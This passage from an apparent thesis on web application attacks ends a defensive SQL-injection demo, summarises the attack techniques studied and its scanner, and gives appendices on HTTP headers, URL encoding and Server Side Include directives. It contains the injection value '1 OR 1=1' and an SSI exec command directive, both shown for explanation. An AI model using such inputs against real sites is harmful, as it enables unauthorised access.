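    print("safe handler:", safe_page(db, {"Language": "1", "Page": "1"}))
    print("safe handler rejects 'Language=1 OR 1=1':",
          rejects(db, {"Language": "1 OR 1=1", "Page": "1"}))
```

With the statement moved server-side, a tampered form can at most select a different language or page; it can no longer name a table, and the scanner's quote test is answered by a validation error rather than a database error.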
CONCLUSION
Contents: I. Results achieved II. Future directions
I. RESULTS ACHIEVED
Against the initial requirement, "Research on attack techniques and the security of Web applications", the thesis has so far achieved the following:
Studied the Web application attack techniques, including:
o Manipulation of passed parameters: URL, hidden form fields, cookies, HTTP headers.
o Injection of code executed on the client: Cross-site Scripting.
o SQL query injection.
o Hijacking a user's session.
o Buffer overflow.
o Denial of service.
o Other techniques: URL encoding, path traversal, null characters, server-side languages, ...
Security measures drawn from the cooperation of the network administrator, the Web application designer and the user.
And the Web Checker program achieved the following basic points:
o Checks whether a web page can be attacked with SQL command injection or parameter tampering.
o Lets the user interact with the server as with an ordinary browser.
Appendices
Contents: A. HTTP header B. URL Encoding C. Server Side Include
Appendix A: HTTP HEADER
General headers are headers that may be used in both HTTP requests and HTTP responses.
Name               Example value
Cache-Control      max-age=10
Connection         Close
Date               Tue, 11 Jul 2000 18:23:51 GMT
Pragma             no-cache
Trailer            Date
Transfer-Encoding  Chunked
Upgrade            SHTTP/1.3
Via                HTTP/1.1 Proxy1, HTTP/1.1 Proxy2
Warning            112 Disconnected Operation

Request headers are headers sent by the client in an HTTP request (only the rows preserved on the page are listed).
Name               Example value
Accept             text/html, image/*
Host                 www.microsoft.com
If-Match             entity_tag001
If-Modified-Since    Tue, 11 Jul 2000 18:23:51 GMT
If-None-Match        entity_tag001
If-Range             entity_tag001 or Tue, 11 Jul 2000 18:23:51 GMT
If-Unmodified-Since  Tue, 11 Jul 2000 18:23:51 GMT
Max-Forwards         3
Proxy-Authorization  [credentials]
Range                Bytes=100-599
Referer              http://www.microsoft.com/resources.asp
TE                   trailers
User-Agent           Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Entity headers may be used in both HTTP requests and HTTP responses. They describe the message body, for example the encoding used.
Name              Example value
Allow             GET, HEAD
Content-Encoding  Gzip
Content-Language  En
Content-Length    8445
Content-Location  http://localhost/page.asp
Content-MD5       [md5-digest]
Content-Range     Bytes 2543-4532/7898
Content-Type      text/html
Expires           Tue, 11 Jul 2000 18:23:51 GMT
Last-Modified     Tue, 11 Jul 2000 18:23:51 GMT
Appendix B: URL ENCODING
Character            Hex code
Control characters:
  (no printable form) %00 %01 %02 %03 %04 %05 %06 %07
  backspace           %08
  tab                 %09
  linefeed            %0a
  (no printable form) %0b %0c
  carriage return     %0d
  (no printable form) %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f
Printable characters:
  space %20   ! %21   " %22   # %23   $ %24   % %25   & %26   ' %27
  ( %28       ) %29   * %2a   + %2b   , %2c   - %2d   . %2e   / %2f
  0-9         %30-%39
  : %3a       ; %3b   < %3c   = %3d   > %3e   ? %3f   @ %40
  A-Z         %41-%5a
  [ %5b       \ %5c   ] %5d   ^ %5e   _ %5f   ` %60
  a-z         %61-%7a
  { %7b       | %7c   } %7d   ~ %7e   (delete) %7f
Bytes %80-%ff have no printable ASCII form and are listed as codes only: %80 ... %ff.
Appendix C: SERVER SIDE INCLUDE
Directive   Example                                                      Explanation / parameters
CONFIG      <!--#config sizefmt="bytes" -->                              controls the file-size and date format
COOKIE      <!--#cookie if="C1" then="hello" alt="bye"-->                gets a cookie
HITCOUNT    <!--#hitcount -->                                            total number of connections on the server
ECHO        <!--#echo reqheader="referer" -->
EXEC        <!--#exec cmd="ls -lsa" -->
FLASTMOD    <!--#flastmod-->
FSIZE       <!--#fsize -->
INCLUDE     <!--#include file="included.html" -->                        parameters: file, virtual, ifheader, else
JDBC        <!--#jdbc select="SELECT * FROM User" ...                    parameters: select, url, name, column, next, driver, password, user
SERVLET
Control statements:
IF                                                                       parameters: name
LOOP        <!--#endloop name="loop2" -->                                parameters: name, command, var, equals
            <!--#exitloop name="loop2" command="cpt" var="cpt1" equals="4" -->